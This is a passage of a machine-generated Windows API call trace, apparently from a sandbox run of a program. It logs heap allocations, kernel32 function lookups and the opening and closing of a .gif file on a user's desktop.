lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.772] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0075.772] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.772] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.772] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.772] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0075.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0075.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10001) returned 0x771fe8 [0075.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0075.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x33) returned 0x6b8978 [0075.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif", cchWideChar=51, lpMultiByteStr=0x6b8978, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif", lpUsedDefaultChar=0x0) returned 51 [0075.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0075.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.773] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4n8tfmd4.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0075.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0075.774] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.774] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.774] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0075.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0075.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=51, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0075.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x66) returned 0x6a0b38 [0075.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=51, lpWideCharStr=0x6a0b38, cchWideChar=51 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif") returned 51 [0075.774] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x69d730 [0075.774] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0b38 | out: hHeap=0x650000) returned 1 [0075.774] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0075.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0075.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0075.775] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.775] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0075.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0075.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0075.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0075.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.776] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.776] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6969c0 | out: hHeap=0x650000) returned 1 [0075.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0075.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0075.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.778] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0075.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8978 [0075.778] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.779] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.779] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.779] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.779] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.779] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.779] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0075.779] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.779] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0075.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.780] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e4b0 [0075.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76e4b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0075.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.781] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0075.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6a8 [0075.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0075.781] CloseHandle (hObject=0x140) returned 1 [0075.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.782] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: 